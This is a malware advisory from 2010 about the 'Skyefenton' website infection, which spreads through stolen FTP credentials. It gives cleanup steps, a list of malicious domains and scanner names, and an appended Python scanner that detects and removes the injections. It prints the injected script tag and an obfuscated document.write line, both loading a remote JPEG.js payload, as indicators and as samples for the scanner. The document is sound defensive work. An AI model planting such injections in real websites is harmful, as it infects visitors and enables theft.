Skyefenton Malware
Updated: October 26, 2010
The Skyefenton malware places obfuscated malicious JavaScript into a website's web pages and JavaScript files. To clean the website, either revert it to a clean backup or remove the malicious code from the web pages. The malware gains access to the website through FTP credentials that have been compromised by malware located on a computer that has accessed the website via FTP. To prevent the website from being reinfected, the FTP password needs to be changed and the malware removed from the infected computer before it is used again to access the website via FTP.
Recent Script Format On Web Pages:
<script type="text/javascript" src="http://inc.propertyfiend.com:8080/JPEG.js"></script>
<!--3a723164f16a6802caf1d9808629e3b1-->
Recent Script Format On JavaScript Files:
document.write('<s'+'cript type="text/javascript" src="http://inc.propertyfiend.com:8080/JPEG.js"></scr'+'ipt>');
Recent Domains Used by the Malware: kollinsoy.skyefenton.com, inc.propertyfiend.com, iopap.upperdarby26.com, dodo.busop.info, dolgo.lulucabana.com, solk.seamscreative.info, sfofotky.iexam.info, soaoo.blog-salopes.com, oployau.fancountblogger.com, sokyoss.drelshazly.com, dolfy.sedonahyperbarics.com, addle.diretctrishta.com, utmost.dawnandjimmy.us
Recent Virus Scan Identifications: HTML:Script-inf, Mal/Badsrc-C, JS:Illredir-CI [Trj]
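Added example, not part of the original advisory: a Python scanner that finds the two injection formats shown above in a local copy of a site and can strip them during cleanup. The function names, regular expressions, file suffix list and sample content are assumptions constructed for illustration; the patterns match the structure of the injection (remote script tag plus 32-hex-digit comment marker, or a split `document.write`) rather than one specific domain.

```python
import re
from pathlib import Path

# Format 1 (web pages): remote <script src> tag followed by a 32-hex-digit comment marker.
TAG_RE = re.compile(
    r'<script\b[^>]*\bsrc="http://([^/":]+)(?::\d+)?/[^"]*"[^>]*>\s*</script>'
    r'\s*<!--[0-9a-f]{32}-->', re.I)
# Format 2 (JavaScript files): document.write() of a script tag split as '<s'+'cript'.
WRITE_RE = re.compile(
    r'''document\.write\(\s*'<s'\s*\+\s*'cript\b.*?src="http://([^/":]+)(?::\d+)?/.*?\)\s*;?''',
    re.I)

def scan_text(text):
    """Return (format, host, matched_text) for every injection found in text."""
    hits = [("html-tag", m.group(1).lower(), m.group(0)) for m in TAG_RE.finditer(text)]
    hits += [("js-write", m.group(1).lower(), m.group(0)) for m in WRITE_RE.finditer(text)]
    return hits

def strip_injection(text):
    """Return text with both injection formats removed; diff the result before deploying."""
    return WRITE_RE.sub("", TAG_RE.sub("", text))

def scan_tree(root, suffixes=(".html", ".htm", ".php", ".js")):
    """Walk a local copy of the site and return (path, format, host) per hit."""
    report = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            report += [(str(path), fmt, host) for fmt, host, _ in scan_text(text)]
    return report

# Constructed samples built from the two formats shown in the advisory.
SAMPLE_PAGE = (
    '<html><body><p>Hello</p>'
    '<script type="text/javascript" src="http://inc.propertyfiend.com:8080/JPEG.js"></script>\n'
    '<!--3a723164f16a6802caf1d9808629e3b1-->'
    '<script src="/js/site.js"></script></body></html>')
SAMPLE_JS = (
    "function init(){}\n"
    "document.write('<s'+'cript type=\"text/javascript\" "
    "src=\"http://inc.propertyfiend.com:8080/JPEG.js\"></scr'+'ipt>');\n")

if __name__ == "__main__":
    for name, sample in (("page", SAMPLE_PAGE), ("js", SAMPLE_JS)):
        for fmt, host, _ in scan_text(sample):
            print(f"{name}: {fmt} injection loading from {host}")
```

Run `scan_tree()` against a downloaded copy of the site, not the live server, and compare the reported hosts with the domain list above.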